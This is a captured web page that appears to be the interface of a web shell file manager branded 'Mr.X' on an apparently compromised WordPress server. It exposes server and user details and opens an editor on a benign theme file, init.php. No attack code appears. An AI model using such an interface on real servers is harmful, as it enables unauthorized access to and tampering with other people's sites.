🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:init.php
<?php /** * Init theme part while core plugin is disabled. * * @since 7.1.0 * @version 1.0.0 */ add_action( 'wp_enqueue_scripts', function (){ $theme = wp_get_theme(); wp_enqueue_style("plugin-disabled", get_template_directory_uri().'/framework/plugin-disabled/css/style.css', array(), $theme->version); }, 150 ); add_action( 'etheme_header', function (){ return get_template_part( 'framework/plugin-disabled/templates/header' ); } ); //etheme_copyrights_content
Save Changes
Cancel
Create New File
Create New Folder